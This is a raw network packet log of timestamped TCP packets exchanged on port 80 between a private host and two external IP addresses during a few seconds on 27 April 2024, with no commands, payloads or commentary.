Apr 27, 2024 02:19:34.623096943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.623106003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.623187065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.629271030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.629362106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.629415035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.629497051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.637204885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.637253046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.637286901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.637315989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.637343884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.637387037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.637398958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.637459040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.637466908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.637528896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.651194096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.651278973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.651288033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.708714008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.708772898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.796382904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.796452999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.796586037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.796629906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.797847986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.797908068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.797945023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.798120022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.798166037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.798206091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.798351049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.798424006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.798464060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.801609039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.801656008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.801683903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.801728010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.809326887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.809391022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.809442043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.809494019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.809535980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.809580088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.809621096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.809664965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.809725046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.809767962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.809794903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.809838057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.812314034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.812365055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.812397003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.812438011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.846544027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.846615076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.904278994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.904357910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.904385090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.904572010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.967787027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.967861891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.967930079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.967950106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.967978001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.968002081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.972774982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.972840071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.980721951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.980784893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.980793953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.980834007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.981221914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.981264114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.981332064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.981374025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.981439114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.981479883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.981492996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.981534004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.981554985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:34.981595039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:34.992772102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.992821932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.992826939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.992860079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.993010044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.993052006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.993099928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.993144989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:34.993146896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:34.993185997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.001770973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.001835108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.001851082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.001893997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.008836031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.008856058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.008889914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.008915901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.042222023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.042306900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.099987030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.100109100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.142241001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.142385960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.142425060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.142673969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.142726898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.142726898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.146877050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.146929979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.155117035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.155174017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.155255079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.155296087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.155442953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.155483007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.155618906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.155659914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.155890942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.155930042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.156075954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.156095028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.156121016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.156136036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.190602064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.190728903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.190865040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.192996025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.196607113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.197201014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.197280884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.197323084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.204046011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.204117060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.204169989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.237607002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.295962095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.296133041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.314905882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.315068007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.315103054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.315150023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.315160036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.315201044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.319468975 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.319524050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.327588081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.327655077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.327754974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.327774048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.327800989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.327816010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.328161001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.328177929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.328222036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.328222036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.328329086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.328372002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.328397989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.328440905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.388226986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.391922951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.391987085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.391988993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.392029047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.392071009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.392450094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.392497063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.392544031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.399126053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.399195910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.399238110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.487116098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.487148046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.487179995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.487198114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.487205029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.487245083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.491182089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.491241932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.491314888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.491333961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.491353989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.491375923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.500582933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.500619888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.500637054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.500638008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.500653982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.500660896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.500680923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.500694036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.500724077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.500765085 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.501291990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.501331091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.501357079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.501393080 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.587157965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.587229013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.587348938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.587348938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.587398052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.587403059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.587479115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.587521076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.587651968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.594316959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.594336033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.594381094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.658338070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.658556938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.658576012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.658577919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.658629894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.658698082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.662745953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.662828922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.672486067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.672565937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.672776937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.672795057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.672811985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.672841072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.672920942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.672946930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.673024893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.673051119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.673120022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.687345982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.687386036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.687408924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.687479019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.687602043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.782713890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.782736063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.782815933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.782816887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.782859087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.782936096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.782938957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.783005953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.789851904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.789901972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.789932966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.789998055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.831459045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.831551075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.831645966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.831645966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.831664085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.831736088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.835273027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.835340023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.845305920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.845347881 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.845477104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.845923901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:35.845957041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.845999956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:35.882586002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.882603884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.882621050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.882639885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.882787943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.882787943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.977205992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.977226019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.977242947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.977261066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.977262020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.977278948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.977278948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.977298975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.977300882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.977344036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.984661102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.984699011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:35.984705925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:35.984767914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.002211094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.002273083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.002372026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.002391100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.002418041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.002432108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.005211115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.005269051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.015418053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.015467882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.015932083 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.015978098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.015980005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.016021967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.077264071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.077281952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.077301025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.077327967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.121448040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.173264027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.173294067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.173343897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.173352957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.173396111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.173456907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.173724890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.173743010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.173782110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.173806906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.173984051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.174030066 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.176697016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.176723003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.176748991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.176764011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.180929899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.186916113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.186980009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.187371016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.187407970 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:36.187416077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.187449932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:36.273725033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.273799896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.273875952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.273896933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.273926020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.273957014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:36.316687107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:36.316905975 CEST	49734	80	192.168.2.4	176.97.76.106
